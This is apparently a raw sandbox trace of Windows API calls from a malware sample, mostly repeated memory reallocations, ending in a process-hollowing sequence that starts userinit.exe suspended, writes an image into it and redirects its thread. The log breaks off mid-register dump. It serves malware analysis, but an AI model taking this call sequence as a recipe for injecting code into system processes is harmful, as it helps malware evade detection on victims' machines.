[0086.235] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.235] GlobalUnlock (hMem=0x189000c) returned 0
[0086.235] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0086.235] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.236] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.236] GlobalUnlock (hMem=0x189000c) returned 0
[0086.236] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0086.236] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.237] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.237] GlobalUnlock (hMem=0x189000c) returned 0
[0086.237] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0086.237] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.238] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.238] GlobalUnlock (hMem=0x189000c) returned 0
[0086.238] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0086.238] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.239] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.239] GlobalUnlock (hMem=0x189000c) returned 0
[0086.239] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0086.239] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.240] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.240] GlobalUnlock (hMem=0x189000c) returned 0
[0086.240] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0086.240] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.241] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.241] GlobalUnlock (hMem=0x189000c) returned 0
[0086.241] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0086.241] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.241] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.241] GlobalUnlock (hMem=0x189000c) returned 0
[0086.241] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0086.241] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.242] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.242] GlobalUnlock (hMem=0x189000c) returned 0
[0086.242] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0086.242] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.243] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.243] GlobalUnlock (hMem=0x189000c) returned 0
[0086.243] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0086.243] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.244] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.244] GlobalUnlock (hMem=0x189000c) returned 0
[0086.244] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0086.244] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.245] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.245] GlobalUnlock (hMem=0x189000c) returned 0
[0086.245] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0086.245] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.246] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.246] GlobalUnlock (hMem=0x189000c) returned 0
[0086.246] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0086.246] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.247] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.247] GlobalUnlock (hMem=0x189000c) returned 0
[0086.247] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0086.247] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.248] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.248] GlobalUnlock (hMem=0x189000c) returned 0
[0086.248] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0086.248] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.249] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.249] GlobalUnlock (hMem=0x189000c) returned 0
[0086.249] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0086.249] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.250] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.250] GlobalUnlock (hMem=0x189000c) returned 0
[0086.250] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0086.250] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.251] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.251] GlobalUnlock (hMem=0x189000c) returned 0
[0086.251] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0086.251] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.252] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.252] GlobalUnlock (hMem=0x189000c) returned 0
[0086.252] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0086.252] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.253] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.253] GlobalUnlock (hMem=0x189000c) returned 0
[0086.253] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0086.253] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.254] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.254] GlobalUnlock (hMem=0x189000c) returned 0
[0086.254] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0086.254] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.254] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.255] GlobalUnlock (hMem=0x189000c) returned 0
[0086.255] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0086.255] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.255] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.255] GlobalUnlock (hMem=0x189000c) returned 0
[0086.255] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0086.256] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.256] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.256] GlobalUnlock (hMem=0x189000c) returned 0
[0086.256] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0086.256] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.257] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.257] GlobalUnlock (hMem=0x189000c) returned 0
[0086.257] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0086.257] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.258] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0086.258] GlobalUnlock (hMem=0x189000c) returned 0
[0086.258] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0086.258] GlobalLock (hMem=0x189000c) returned 0x25b100
[0086.259] VirtualAlloc (lpAddress=0x1794000, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x4) returned 0x1794000
[0086.267] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0xe8, hThread=0xe4, dwProcessId=0xf48, dwThreadId=0xf4c)) returned 1
[0086.306] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0086.306] GetThreadContext (in: hThread=0xe4, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0xef2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x12faa8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0086.307] ReadProcessMemory (in: hProcess=0xe8, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c74, nSize=0x4, lpNumberOfBytesRead=0x1b0c7c | out: lpBuffer=0x1b0c74*, lpNumberOfBytesRead=0x1b0c7c*=0x4) returned 1
[0086.307] VirtualAllocEx (hProcess=0xe8, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0086.509] VirtualAlloc (lpAddress=0x17f4000, dwSize=0x64000, flAllocationType=0x1000, flProtect=0x4) returned 0x17f4000
[0086.518] WriteProcessMemory (in: hProcess=0xe8, lpBaseAddress=0x400000, lpBuffer=0x17f020c*, nSize=0x63000, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x17f020c*, lpNumberOfBytesWritten=0x1b0c7c*=0x63000) returned 1
[0086.534] WriteProcessMemory (in: hProcess=0xe8, lpBaseAddress=0x7ffdf008, lpBuffer=0x1b0c78*, nSize=0x4, lpNumberOfBytesWritten=0x1b0c7c | out: lpBuffer=0x1b0c78*, lpNumberOfBytesWritten=0x1b0c7c*=0x4) returned 1
[0086.534] SetThreadContext (hThread=0xe4, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x12faa8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, 